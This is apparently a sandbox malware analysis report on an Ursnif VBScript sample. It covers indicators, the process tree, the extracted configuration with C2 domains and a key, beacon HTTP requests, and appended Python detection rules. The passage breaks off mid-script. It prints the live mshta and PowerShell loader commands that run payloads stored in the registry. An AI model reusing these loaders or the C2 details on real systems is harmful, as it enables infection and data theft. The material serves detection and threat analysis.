Windows Analysis Report 345678.vbs

Overview

General Information

Sample Name: 345678.vbs
Analysis ID: 481077
MD5: 9e6b216f5112b583f035ac621c78ea4e
SHA1: 8e1636abf1eb1dd966dce2b92fd44a1d9a3e32d3
SHA256: cbf23e2c51909c02fc3898b4fb078cb1fc08935874add1c045c592096ff18379
Detection

Ursnif
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Found malware configuration
Sigma detected: Powershell run code from registry
Benign windows process drops PE files
Multi AV Scanner detection for domain / URL
Sigma detected: Encoded IEX
Hooks registry keys query functions (used to hide registry keys)
Maps a DLL or memory area into another process
Compiles code for process injection (via .Net compiler)
Uses nslookup.exe to query domains
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Creates processes via WMI
Allocates memory in foreign processes
Sigma detected: MSHTA Spawning Windows Shell
Deletes itself after installation
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Modifies the export address table of user mode modules (user mode EAT hooks)
Writes registry values via WMI
Writes to foreign memory regions
Changes memory attributes in foreign processes to executable or writable
Suspicious powershell command line found
Modifies the prolog of user mode functions (user mode inline hooks)
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Sigma detected: Mshta Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Modifies the import address table of user mode modules (user mode IAT hooks)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Queries the installation date of Windows
Detected potential crypto function
Contains functionality to launch a process as a different user
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Java / VBScript file with very long strings (likely obfuscated code)
Searches for the Microsoft Outlook file path
Drops PE files
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Launches processes in debugging mode, may be used to hinder debugging
Compiles C# or VB.Net code
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Rundll32 Activity
Internet Provider seen in connection with other malware
Stores large binary data to the registry
Contains functionality to query CPU information (cpuid)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Enables debug privileges
AV process strings found (often used to terminate AV products)
PE file does not import any functions
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses Microsoft's Enhanced Cryptographic Provider
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 3868 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\345678.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • WmiPrvSE.exe (PID: 5808 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: A782A4ED336750D10B3CAF776AFE8E70)
    • rundll32.exe (PID: 6000 cmdline: rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer MD5: 73C519F050C20580F8A62C849D49215A)
      • rundll32.exe (PID: 6072 cmdline: rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • control.exe (PID: 2896 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
          • rundll32.exe (PID: 4612 cmdline: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)
  • WmiPrvSE.exe (PID: 6716 cmdline: C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding MD5: 7AB59579BA91115872D6E51C54B9133B)
  • WmiPrvSE.exe (PID: 6844 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: A782A4ED336750D10B3CAF776AFE8E70)
  • mshta.exe (PID: 6556 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Rm6e='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Rm6e).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 6948 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 7044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 7060 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\uitt4j30\uitt4j30.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 7072 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES36.tmp' 'c:\Users\user\AppData\Local\Temp\uitt4j30\CSC1FA535E1192D4199A0DB18CBAD2D0A9.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 7080 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\wyozc5bn\wyozc5bn.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 7100 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESCC9.tmp' 'c:\Users\user\AppData\Local\Temp\wyozc5bn\CSC8A734EFC87854564869CBAF05337FE1.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • explorer.exe (PID: 3472 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • RuntimeBroker.exe (PID: 4016 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
        • cmd.exe (PID: 3208 cmdline: cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\76A9.bi1' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 2424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • nslookup.exe (PID: 6256 cmdline: nslookup myip.opendns.com resolver1.opendns.com MD5: AF1787F1DBE0053D74FC687E7233F8CE)
  • cleanup

Malware Configuration

Threatname: Ursnif

{
  "RSA Public Key": "4AYdzflNRXYlq5A89hwCjrU+QvoXxjpdUxRPAdq3bBwI9ExkYDjHy9AWeshiGXrgIzFlNVtLrifcFS4LJjRxWiTG6Fca4Vt6MI5WOos+fChdUStUtjzPhvjxLI5XIPSBz5r2O1dlmC1xuOEDpRs8BbpWGdZ2yYEdD2dU4efFbSK7SBcRAao3mGwKzc2GlmjegxJ/fScW81u3keNnZqy2SbgEIUg5Ycv4J3eUirSdWDASxFovB3C3eAKRiuRkEzJcRqU2y9vVOyCbmx6uiVNonJWQxMoDxpw6mwokGsvtDFEgCJXMl+lbKlUaqdSAUK0Tij5ay8sYpetWDvt4nCFDVBf09fSWTGo06hdy0B5+I4w=",
  "c2_domain": [
    "art.microsoftsofymicrosoftsoft.at",
    "r23cirt55ysvtdvl.onion",
    "fop.langoonik.com",
    "poi.redhatbabby.at",
    "pop.biopiof.at",
    "l46t3vgvmtx5wxe6.onion",
    "v10.avyanok.com",
    "apr.intoolkom.at",
    "fgx.dangerboy.at"
  ],
  "ip_check_url": ["curlmyip.net", "ident.me", "l2.io/ip", "whatismyip.akamai.com"],
  "serpent_key": "rQH4gusjF0tL2dQz",
  "server": "580",
  "sleep_time": "5",
  "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "600",
  "time_value": "600",
  "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "240",
  "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300",
  "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "240",
  "not_use(CRC_BCTIMEOUT)": "10",
  "botnet": "2500",
  "SetWaitableTimer_value": "60"
}

Note: the host actually contacted during this run, atl.bigbigpoppa.com (185.251.90.253, see Networking below), is not among the configured c2_domain entries; the configured domains and the observed beacon host should both go on a blocklist.

Yara Overview

Memory Dumps

Source | Rule | Description | Author
00000026.00000000.689267141.00000000000B0000.00000040.00020000.sdmp | JoeSecurity_Ursnif_2 | Yara detected Ursnif | Joe Security
00000015.00000003.674925950.00000000059B8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
00000028.00000003.754147567.00000195D906C000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
00000026.00000003.693326319.000001BF361AC000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
00000015.00000003.614926356.00000000051B8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
(36 further matching memory dumps not shown)

Unpacked PEs

Source | Rule | Description | Author
21.3.rundll32.exe.50ba4a0.1.raw.unpack | JoeSecurity_Ursnif_2 | Yara detected Ursnif | Joe Security
21.3.rundll32.exe.50ba4a0.1.unpack | JoeSecurity_Ursnif_2 | Yara detected Ursnif | Joe Security
21.3.rundll32.exe.5168d48.2.raw.unpack | JoeSecurity_Ursnif_2 | Yara detected Ursnif | Joe Security
21.3.rundll32.exe.51394a0.3.raw.unpack | JoeSecurity_Ursnif_2 | Yara detected Ursnif | Joe Security

Sigma Overview

System Summary:

Four rules fired on the same process-creation event (powershell.exe PID 6948, launched by mshta.exe PID 6556); the event is listed once below the rule names.

Sigma detected: Encoded IEX (Author: Florian Roth)
Sigma detected: MSHTA Spawning Windows Shell (Author: Michael Haag)
Sigma detected: Mshta Spawning Windows Shell (Author: Florian Roth)
Sigma detected: Non Interactive PowerShell (Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements))

Source: Process started
  Image / NewProcessName / OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  ProcessId: 6948
  Command / CommandLine / ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
  CommandLine|base64offset|contains: (empty)
  ParentImage: C:\Windows\System32\mshta.exe
  ParentProcessId: 6556
  ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Rm6e='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Rm6e).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'

Sigma detected: Suspicious Csc.exe Source File Folder (Author: Florian Roth)
Source: Process started
  Image / NewProcessName / OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
  ProcessId: 7060
  Command / CommandLine / ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\uitt4j30\uitt4j30.cmdline'
  CommandLine|base64offset|contains: zw
  ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  ParentProcessId: 6948
  ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))

Sigma detected: Suspicious Rundll32 Activity (Author: juju4, Jonhnathan Ribeiro, oscd.community)
Source: Process started
  Image / NewProcessName / OriginalFileName: C:\Windows\System32\rundll32.exe
  ProcessId: 4612
  Command / CommandLine / ProcessCommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
  CommandLine|base64offset|contains: (empty)
  ParentImage: C:\Windows\System32\control.exe
  ParentProcessId: 2896
  ParentCommandLine: C:\Windows\system32\control.exe -h

Sigma detected: T1086 PowerShell Execution (Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research))
Source: Pipe created
  PipeName: \PSHost.132757666291999114.6948.DefaultAppDomain.powershell

Data Obfuscation:

Sigma detected: Powershell run code from registry (Author: Joe Security)
Source: Process started; the same powershell.exe event as above (ProcessId 6948, ParentProcessId 6556). The mshta stage reads the DeviceFile value and the PowerShell stage the UtilTool value of the same key, HKCU\Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550, so the second and third stages are held only in the registry (compare "Stores large binary data to the registry" in the signature list). Collecting that key is the first triage step on an infected host.
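The Sigma matches above are all on a handful of process-creation events. As an added example (not part of the Joe Sandbox report and not the published Sigma rules themselves), the Python below reproduces the core logic of those rules over constructed process-creation events built from this report's process tree, so the mshta -> powershell -> csc chain and the OpenDNS public-IP lookup can be tested offline. The `mshta_eval_regread` rule is my own addition (it fires on the HTA body itself rather than on the child process); the benign control events with PIDs 9000-9002 are invented; `IP_CHECK_HOSTS` combines the OpenDNS name from the process tree with the `ip_check_url` hosts from the extracted configuration.

```python
"""Sigma-style checks for the mshta -> registry -> powershell -> csc chain, run over
constructed process-creation events. Added example; not Joe Sandbox code and not the
published Sigma rules themselves."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


# Constructed from this report's process tree (PIDs and command lines as recorded there).
# ppid 0 = parent not given in the report. PIDs 9000-9002 are invented benign controls.
EVENTS = [
    ProcEvent(3868, 0, r"C:\Windows\System32\wscript.exe",
              r"C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\345678.vbs'"),
    ProcEvent(6556, 0, r"C:\Windows\System32\mshta.exe",
              r"'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Rm6e='wscript.shell';"
              r"resizeTo(0,2);eval(new ActiveXObject(Rm6e).regread('HKCU\\\Software\\AppDataLow"
              r"\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));"
              r"if(!window.flag)close()</script>'"),
    ProcEvent(6948, 6556, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]"
              r"::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft"
              r"\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))"),
    ProcEvent(7060, 6948, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
              r"'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths "
              r"@'C:\Users\user\AppData\Local\Temp\uitt4j30\uitt4j30.cmdline'"),
    ProcEvent(3208, 3472, r"C:\Windows\System32\cmd.exe",
              r"cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\76A9.bi1'"),
    # invented controls: an admin reading the registry without iex, and a normal developer build
    ProcEvent(9001, 9000, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -NoProfile Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion"),
    ProcEvent(9002, 9001, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
              r"csc.exe /out:C:\src\app\bin\app.exe C:\src\app\Program.cs"),
]

# myip.opendns.com comes from the process tree; the rest from the config's ip_check_url list.
IP_CHECK_HOSTS = ("myip.opendns.com", "curlmyip.net", "ident.me", "l2.io", "whatismyip.akamai.com")
SHELLS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe"}


def basename(image: str) -> str:
    """Last path component of a Windows image path, lower-cased (portable, no os.path)."""
    return image.rsplit("\\", 1)[-1].lower()


def rule_mshta_spawning_shell(e, parents):
    p = parents.get(e.ppid)
    return p is not None and basename(p.image) == "mshta.exe" and basename(e.image) in SHELLS


def rule_mshta_eval_regread(e, parents):
    # Own addition: the HTA body evals whatever WScript.Shell.RegRead returns.
    cl = e.cmdline.lower()
    return basename(e.image) == "mshta.exe" and "regread(" in cl and "eval(" in cl


def rule_powershell_code_from_registry(e, parents):
    # All three parts are required: an invoke, a registry read, and a registry drive.
    cl = e.cmdline
    return (basename(e.image) == "powershell.exe"
            and re.search(r"\b(iex|invoke-expression)\b", cl, re.I) is not None
            and re.search(r"\b(gp|get-itemproperty)\b", cl, re.I) is not None
            and re.search(r"\bhk(cu|lm):", cl, re.I) is not None)


def rule_csc_temp_source(e, parents):
    return (basename(e.image) == "csc.exe"
            and re.search(r"\\appdata\\local\\temp\\", e.cmdline, re.I) is not None)


def rule_external_ip_lookup(e, parents):
    cl = e.cmdline.lower()
    return any(h in cl for h in IP_CHECK_HOSTS)


RULES = {
    "mshta_spawning_shell": rule_mshta_spawning_shell,
    "mshta_eval_regread": rule_mshta_eval_regread,
    "powershell_code_from_registry": rule_powershell_code_from_registry,
    "csc_temp_source": rule_csc_temp_source,
    "external_ip_lookup": rule_external_ip_lookup,
}


def run_rules(events):
    """Map pid -> list of rule names that fired, in RULES order."""
    parents = {e.pid: e for e in events}
    hits = {}
    for e in events:
        fired = [name for name, fn in RULES.items() if fn(e, parents)]
        if fired:
            hits[e.pid] = fired
    return hits


def lineage(events, pid):
    """Image basenames from pid up to the highest ancestor present in `events`."""
    parents = {e.pid: e for e in events}
    chain, seen = [], set()
    while pid in parents and pid not in seen:
        seen.add(pid)
        chain.append(basename(parents[pid].image))
        pid = parents[pid].ppid
    return chain


if __name__ == "__main__":
    for pid, names in run_rules(EVENTS).items():
        print(pid, " <- ".join(lineage(EVENTS, pid)), names)
```

The registry rule deliberately requires all three parts (an invoke, a `gp`/`Get-ItemProperty`, and an `HKCU:`/`HKLM:` drive) so that an administrator simply reading a key, as in the control event, does not fire; in production the parent/child rule should also cover the `-Embedding`-style WMI launches this report shows under WmiPrvSE.exe, which these events do not include.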

Jbx Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: http://atl.bigbigpoppa.com/ip_2B0cVuBTOjpbo/BZT_2FEcZD79y2H/f3wS9_2BbAkX3nftyB/uQG5JIxM3/hkTHWn_2F_2BpOIsZCFn/4kLDBNiVWLvnXfwIKVW/_2B0IsHxbOfD1ufcXkPjJo/EpDoUxcMaWCn1/8Cn5O7LC/eCiAOLLPPUL3E_2BUmdr0wu/7S9z8dGBsB/5jo94woog9YMCzFYk/vxvIpoLH3pVt/RLdRfO7DC2t/yTMvjyOY5hDeBN/auRC60Y4xtz4V1KDXQP2K/Ose2dfWgeEs0tX4x/hD9nLBJRnyryDU3/xZZDK1S2EJHUeFDAor/G09c8MwYv/_2Fz2PGThD9ITT_2BYVA/tVMCZqyJgK7/e | Avira URL Cloud: Label: malware
Source: http://atl.bigbigpoppa.com/KT4MMOqgwbMDk0_2FZz0/hIq6vsma9IDMR0TWVEk/R8VcPjBU_2FKifNFKEzy11/KwQmwxa6P | Avira URL Cloud: Label: malware
Source: http://atl.bigbigpoppa.com/t | Avira URL Cloud: Label: malware
Source: http://atl.bigbigpoppa.com/KT4MMOqgwbMDk0_2FZz0/hIq6vsma9IDMR0TWVEk/R8VcPjBU_2FKifNFKEzy11/KwQmwxa6PANLq/HMQB1nMh/Dw7iIk4wPDbFz5MpJKzoM6O/xJlNu7xTm_/2BJVkAx380cQPl1qK/3MJgDX4sXjAo/UjQmGmv6_2B/EYaPNSI604XL9z/GGit9THH2wZWixIY_2BGE/_2Ftywp1kQkPvPY6/vEmMzODz0Ya_2Fy/CBZtOZch7qD9e_2FA3/3G0B8QjO4/zLpP4zwh3X5MwZp6F5E2/r2m_2Fmc2A2sWLpGKPD/1LL4BJlsYqHKw2i3OPm1CI/3lMhUc9ldfLAb/BfOzMYbz/ndeDEqMw | Avira URL Cloud: Label: malware
Source: http://atl.bigbigpoppa.com/Fd_2Bpcxk2ML4o/4Yi_2FHrWiGKn0A5wFBvD/PRZfU6_2FH1DJVcW/g_2Fg_2F20KxTzq/sMEmuitPFPfj3EtNRD/SA_2FG4XJ/mT_2B9htxgpCM5Sw9dFG/0GOk5wMqEe7jZlQfLGf/mA_2FWhN50DkjSdhxWei_2/FhXBykIpEOclO/crxsB5_2/Ble8n4SiH0d5h4j9OhpB9W8/f7cJNH55_2/BDWX6KOpdls6GJZSC/G_2FbiyNPy_2/FypUL6okzx_/2FAWJjZB1eiGHh/hrIz0_2B7QDXJAzjWHaMR/znK_2FKxXJtI3gHn/_2FediiSJLPcwpE/ATZTCB8xbMUZrLNlLv/_2BOkapjZ/jvpLjf9IYNZ6/RyT | Avira URL Cloud: Label: malware

Found malware configuration
Source: 0000001F.00000002.742621606.000002174F3D0000.00000040.00000001.sdmp | Malware Configuration Extractor: Ursnif (the full configuration is listed in the Malware Configuration section above)

Multi AV Scanner detection for domain / URL
Source: atl.bigbigpoppa.com | Virustotal: Detection: 8%

Code functions and debug strings:
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_00E53276 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\uitt4j30\uitt4j30.pdb@ | source: powershell.exe, 0000001F.00000002.777223322.0000021753319000.00000004.00000001.sdmp
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\uitt4j30\uitt4j30.pdbXP+s | source: powershell.exe, 0000001F.00000002.777223322.0000021753319000.00000004.00000001.sdmp
Source: Binary string: c:\Led-Flower\Spell\cotton_point\please.pdb | source: wscript.exe, 00000001.00000003.535291067.000001763BDE4000.00000004.00000001.sdmp, fum.cpp.1.dr
Source: Binary string: ntdll.pdb | source: rundll32.exe, 00000015.00000003.679916325.0000000005A50000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP | source: rundll32.exe, 00000015.00000003.679916325.0000000005A50000.00000004.00000001.sdmp
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05591802 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05581577 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_055714A0 wcscpy,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05586E4E lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49787 -> 185.251.90.253:80
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49787 -> 185.251.90.253:80
Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49788 -> 185.251.90.253:80
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49788 -> 185.251.90.253:80
Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49789 -> 185.251.90.253:80
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49789 -> 185.251.90.253:80

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe | Domain query: atl.bigbigpoppa.com
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 185.251.90.253 80

Uses nslookup.exe to query domains
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com

HTTP requests to the C2 host (three GETs over plain HTTP, each with the same Firefox 90 User-Agent):
Source: global traffic | HTTP traffic detected:
  GET /KT4MMOqgwbMDk0_2FZz0/hIq6vsma9IDMR0TWVEk/R8VcPjBU_2FKifNFKEzy11/KwQmwxa6PANLq/HMQB1nMh/Dw7iIk4wPDbFz5MpJKzoM6O/xJlNu7xTm_/2BJVkAx380cQPl1qK/3MJgDX4sXjAo/UjQmGmv6_2B/EYaPNSI604XL9z/GGit9THH2wZWixIY_2BGE/_2Ftywp1kQkPvPY6/vEmMzODz0Ya_2Fy/CBZtOZch7qD9e_2FA3/3G0B8QjO4/zLpP4zwh3X5MwZp6F5E2/r2m_2Fmc2A2sWLpGKPD/1LL4BJlsYqHKw2i3OPm1CI/3lMhUc9ldfLAb/BfOzMYbz/ndeDEqMw HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0
  Host: atl.bigbigpoppa.com
Source: global traffic | HTTP traffic detected:
  GET /Fd_2Bpcxk2ML4o/4Yi_2FHrWiGKn0A5wFBvD/PRZfU6_2FH1DJVcW/g_2Fg_2F20KxTzq/sMEmuitPFPfj3EtNRD/SA_2FG4XJ/mT_2B9htxgpCM5Sw9dFG/0GOk5wMqEe7jZlQfLGf/mA_2FWhN50DkjSdhxWei_2/FhXBykIpEOclO/crxsB5_2/Ble8n4SiH0d5h4j9OhpB9W8/f7cJNH55_2/BDWX6KOpdls6GJZSC/G_2FbiyNPy_2/FypUL6okzx_/2FAWJjZB1eiGHh/hrIz0_2B7QDXJAzjWHaMR/znK_2FKxXJtI3gHn/_2FediiSJLPcwpE/ATZTCB8xbMUZrLNlLv/_2BOkapjZ/jvpLjf9IYNZ6/RyT HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0
  Host: atl.bigbigpoppa.com
Source: global traffic | HTTP traffic detected:
  GET /ip_2B0cVuBTOjpbo/BZT_2FEcZD79y2H/f3wS9_2BbAkX3nftyB/uQG5JIxM3/hkTHWn_2F_2BpOIsZCFn/4kLDBNiVWLvnXfwIKVW/_2B0IsHxbOfD1ufcXkPjJo/EpDoUxcMaWCn1/8Cn5O7LC/eCiAOLLPPUL3E_2BUmdr0wu/7S9z8dGBsB/5jo94woog9YMCzFYk/vxvIpoLH3pVt/RLdRfO7DC2t/yTMvjyOY5hDeBN/auRC60Y4xtz4V1KDXQP2K/Ose2dfWgeEs0tX4x/hD9nLBJRnyryDU3/xZZDK1S2EJHUeFDAor/G09c8MwYv/_2Fz2PGThD9ITT_2BYVA/tVMCZqyJgK7/e HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0
  Host: atl.bigbigpoppa.com
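The two Emerging Threats rules above key on the `_2B` and `_2F` tokens in the request path. As an added example that is not from the report or from the ET rule set, the Python below normalises such a path back to base64 and applies a structural check in the same spirit. The order of operations matters: the `/` separators are removed before the `_XX` escapes are decoded, because the bot can split an escape across a separator, as in `xJlNu7xTm_/2BJVkAx` and `crxsB5_2/Ble8n4` in the requests above. `REPORT_PATH` is the third GET path copied verbatim from this report; `encode_ursnif_uri` is an assumption about how the bot builds the path (base64, percent-encode `+`, `/` and `=`, replace `%` with `_`, insert `/` separators), used only for a round-trip test, and its fixed segment length is a simplification. Decoding yields the Serpent-encrypted request body (the configuration above carries `serpent_key`), which this example does not decrypt.

```python
"""Normalise Ursnif/ISFB-style beacon URIs back to base64 and flag them structurally.
Added example; not code from the report or the Snort/ET rule set."""
import base64
import re

# One GET path recorded in this report (host atl.bigbigpoppa.com), copied verbatim.
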